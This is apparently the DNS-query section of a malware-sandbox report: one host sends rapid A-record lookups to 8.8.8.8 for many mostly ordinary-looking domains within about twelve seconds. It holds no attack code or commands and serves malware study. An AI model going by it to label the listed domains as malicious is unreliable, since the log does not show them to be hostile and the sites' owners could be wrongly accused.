                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.760374069 CEST192.168.2.48.8.8.80xb085Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.773689985 CEST192.168.2.48.8.8.80xe5fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.777421951 CEST192.168.2.48.8.8.80x6e47Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.990581036 CEST192.168.2.48.8.8.80x5354Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.008747101 CEST192.168.2.48.8.8.80xf27dStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.057737112 CEST192.168.2.48.8.8.80x7b34Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.100693941 CEST192.168.2.48.8.8.80x8ea7Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.134342909 CEST192.168.2.48.8.8.80x313cStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.146140099 CEST192.168.2.48.8.8.80xc9a9Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.227560997 CEST192.168.2.48.8.8.80x8ce3Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.306240082 CEST192.168.2.48.8.8.80x2cadStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.340238094 CEST192.168.2.48.8.8.80x3c20Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.362109900 CEST192.168.2.48.8.8.80x97e9Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.369779110 CEST192.168.2.48.8.8.80x1b58Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.386898041 CEST192.168.2.48.8.8.80xb4deStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.396619081 CEST192.168.2.48.8.8.80xfca7Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.447279930 CEST192.168.2.48.8.8.80x3f88Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.474246979 CEST192.168.2.48.8.8.80x723eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.481614113 CEST192.168.2.48.8.8.80x27a4Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.494144917 CEST192.168.2.48.8.8.80x8145Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.669238091 CEST192.168.2.48.8.8.80x3457Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.705770969 CEST192.168.2.48.8.8.80x4c8Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.713998079 CEST192.168.2.48.8.8.80xb728Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.716419935 CEST192.168.2.48.8.8.80xb661Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.731040955 CEST192.168.2.48.8.8.80xed88Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.744299889 CEST192.168.2.48.8.8.80xe531Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.773582935 CEST192.168.2.48.8.8.80xb085Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.775727034 CEST192.168.2.48.8.8.80x4c4dStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.787858009 CEST192.168.2.48.8.8.80xe5fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.810750008 CEST192.168.2.48.8.8.80x2007Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.885488033 CEST192.168.2.48.8.8.80x3084Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.919765949 CEST192.168.2.48.8.8.80x7902Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.980107069 CEST192.168.2.48.8.8.80x2172Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.015204906 CEST192.168.2.48.8.8.80x7127Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.019409895 CEST192.168.2.48.8.8.80x363Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.048474073 CEST192.168.2.48.8.8.80xf500Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.116902113 CEST192.168.2.48.8.8.80x5f2bStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.135023117 CEST192.168.2.48.8.8.80x6cffStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.156541109 CEST192.168.2.48.8.8.80xc9a9Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.255526066 CEST192.168.2.48.8.8.80x96a1Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.389974117 CEST192.168.2.48.8.8.80x41a1Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.428397894 CEST192.168.2.48.8.8.80x84d8Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.446233034 CEST192.168.2.48.8.8.80xc5dStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.472779989 CEST192.168.2.48.8.8.80x2c5aStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.499979973 CEST192.168.2.48.8.8.80x3afdStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.507117987 CEST192.168.2.48.8.8.80xdb8dStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.524280071 CEST192.168.2.48.8.8.80x2e30Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.559273958 CEST192.168.2.48.8.8.80x57a0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.565059900 CEST192.168.2.48.8.8.80x2c8fStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.662662983 CEST192.168.2.48.8.8.80xc404Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.713162899 CEST192.168.2.48.8.8.80x96f1Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.770894051 CEST192.168.2.48.8.8.80xb085Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.901329994 CEST192.168.2.48.8.8.80x21e3Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.907324076 CEST192.168.2.48.8.8.80x81cfStandard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.037719011 CEST192.168.2.48.8.8.80x89d9Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.041769028 CEST192.168.2.48.8.8.80x6c81Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.054028034 CEST192.168.2.48.8.8.80xaf0dStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.196980953 CEST192.168.2.48.8.8.80xad0fStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.275290012 CEST192.168.2.48.8.8.80x96ccStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.287843943 CEST192.168.2.48.8.8.80xd9a4Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.291398048 CEST192.168.2.48.8.8.80x2b03Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.334121943 CEST192.168.2.48.8.8.80xab88Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.366957903 CEST192.168.2.48.8.8.80x8543Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.367932081 CEST192.168.2.48.8.8.80xe4c6Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.495459080 CEST192.168.2.48.8.8.80xcd6fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.524632931 CEST192.168.2.48.8.8.80x64f2Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.526835918 CEST192.168.2.48.8.8.80xb47fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.545077085 CEST192.168.2.48.8.8.80xe4c0Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.552259922 CEST192.168.2.48.8.8.80x57a0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.601607084 CEST192.168.2.48.8.8.80xc252Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.685697079 CEST192.168.2.48.8.8.80x854fStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.758863926 CEST192.168.2.48.8.8.80xd636Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.805984020 CEST192.168.2.48.8.8.80x57bStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.839361906 CEST192.168.2.48.8.8.80x7dfaStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.855004072 CEST192.168.2.48.8.8.80x5754Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.132205009 CEST192.168.2.48.8.8.80x736fStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.134602070 CEST192.168.2.48.8.8.80xdbd9Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.137634039 CEST192.168.2.48.8.8.80xfee7Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.161555052 CEST192.168.2.48.8.8.80xc9a9Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.346241951 CEST192.168.2.48.8.8.80xdf95Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.389127016 CEST192.168.2.48.8.8.80x92f8Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.405663013 CEST192.168.2.48.8.8.80x77d9Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.417954922 CEST192.168.2.48.8.8.80x1126Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.434782028 CEST192.168.2.48.8.8.80xe138Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.465266943 CEST192.168.2.48.8.8.80x33d1Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.501780987 CEST192.168.2.48.8.8.80x29e3Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.541613102 CEST192.168.2.48.8.8.80xc64Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.573815107 CEST192.168.2.48.8.8.80x57a0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.891715050 CEST192.168.2.48.8.8.80xb085Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.893038988 CEST192.168.2.48.8.8.80xaf86Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.934900999 CEST192.168.2.48.8.8.80x6b62Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.007823944 CEST192.168.2.48.8.8.80x32c1Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.008704901 CEST192.168.2.48.8.8.80x904bStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.046204090 CEST192.168.2.48.8.8.80x6f5bStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.084372997 CEST192.168.2.48.8.8.80x185bStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.187011957 CEST192.168.2.48.8.8.80x7fe8Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.271891117 CEST192.168.2.48.8.8.80xaf4cStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.273180962 CEST192.168.2.48.8.8.80xbd73Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.274342060 CEST192.168.2.48.8.8.80x2d07Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.366281033 CEST192.168.2.48.8.8.80x2b73Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.370007038 CEST192.168.2.48.8.8.80x3e92Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.478729963 CEST192.168.2.48.8.8.80x733eStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.517822027 CEST192.168.2.48.8.8.80xd6c8Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.600085020 CEST192.168.2.48.8.8.80x5982Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.660727978 CEST192.168.2.48.8.8.80xdd02Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.778810024 CEST192.168.2.48.8.8.80x530fStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.781094074 CEST192.168.2.48.8.8.80x462aStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.783076048 CEST192.168.2.48.8.8.80x9fdaStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.789064884 CEST192.168.2.48.8.8.80x7762Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.793452024 CEST192.168.2.48.8.8.80x8896Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.928483009 CEST192.168.2.48.8.8.80x8095Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.931380033 CEST192.168.2.48.8.8.80xff33Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.271040916 CEST192.168.2.48.8.8.80x569Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.350204945 CEST192.168.2.48.8.8.80x2633Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.421063900 CEST192.168.2.48.8.8.80xcb7cStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.487627983 CEST192.168.2.48.8.8.80x608bStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.670501947 CEST192.168.2.48.8.8.80x11a1Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.819091082 CEST192.168.2.48.8.8.80xf41bStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.833741903 CEST192.168.2.48.8.8.80x568bStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.053711891 CEST192.168.2.48.8.8.80xf379Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.055124998 CEST192.168.2.48.8.8.80x76feStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.055500984 CEST192.168.2.48.8.8.80xd6c8Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.156244040 CEST192.168.2.48.8.8.80x57a0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.258507967 CEST192.168.2.48.8.8.80x407dStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.878417969 CEST192.168.2.48.8.8.80x7c17Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.935664892 CEST192.168.2.48.8.8.80x868bStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.994102955 CEST192.168.2.48.8.8.80x132fStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.049860001 CEST192.168.2.48.8.8.80xc8eStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.132038116 CEST192.168.2.48.8.8.80xd6c8Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.166953087 CEST192.168.2.48.8.8.80x6711Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.173000097 CEST192.168.2.48.8.8.80x442cStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.175996065 CEST192.168.2.48.8.8.80xa9a0Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.246413946 CEST192.168.2.48.8.8.80xf605Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.251486063 CEST192.168.2.48.8.8.80x726Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.328963041 CEST192.168.2.48.8.8.80x27a3Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.334553003 CEST192.168.2.48.8.8.80x87Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.172882080 CEST192.168.2.48.8.8.80x83cdStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.264020920 CEST192.168.2.48.8.8.80xf40fStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.265479088 CEST192.168.2.48.8.8.80xdcc2Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.343915939 CEST192.168.2.48.8.8.80xf605Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.350236893 CEST192.168.2.48.8.8.80x6277Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.512631893 CEST192.168.2.48.8.8.80x87Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.520088911 CEST192.168.2.48.8.8.80x73e1Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.522562981 CEST192.168.2.48.8.8.80x94Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.527101994 CEST192.168.2.48.8.8.80x61d0Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.566812992 CEST192.168.2.48.8.8.80xf546Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.582663059 CEST192.168.2.48.8.8.80xc78bStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.586402893 CEST192.168.2.48.8.8.80x153Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.057380915 CEST192.168.2.48.8.8.80xca4bStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.060022116 CEST192.168.2.48.8.8.80x4a10Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.147586107 CEST192.168.2.48.8.8.80xd6c8Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.199335098 CEST192.168.2.48.8.8.80xab3Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.244406939 CEST192.168.2.48.8.8.80xbf78Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.333986998 CEST192.168.2.48.8.8.80xf605Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.482516050 CEST192.168.2.48.8.8.80x285dStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.521567106 CEST192.168.2.48.8.8.80x87Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.534861088 CEST192.168.2.48.8.8.80xd933Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.541466951 CEST192.168.2.48.8.8.80x7155Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.573743105 CEST192.168.2.48.8.8.80xec04Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.666738033 CEST192.168.2.48.8.8.80x6897Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.719034910 CEST192.168.2.48.8.8.80xbd48Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.793554068 CEST192.168.2.48.8.8.80xbed0Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.963709116 CEST192.168.2.48.8.8.80x2342Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.965442896 CEST192.168.2.48.8.8.80x4756Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.989257097 CEST192.168.2.48.8.8.80x366bStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.995930910 CEST192.168.2.48.8.8.80xee3fStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.315027952 CEST192.168.2.48.8.8.80xac02Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.385556936 CEST192.168.2.48.8.8.80xd046Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.450711012 CEST192.168.2.48.8.8.80xb597Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.521599054 CEST192.168.2.48.8.8.80xd933Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.639231920 CEST192.168.2.48.8.8.80x4e08Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.750298023 CEST192.168.2.48.8.8.80x463fStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.776829004 CEST192.168.2.48.8.8.80xc192Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.942625046 CEST192.168.2.48.8.8.80xaecdStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.090096951 CEST192.168.2.48.8.8.80x7da7Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.197652102 CEST192.168.2.48.8.8.80x1680Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.228840113 CEST192.168.2.48.8.8.80xe737Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
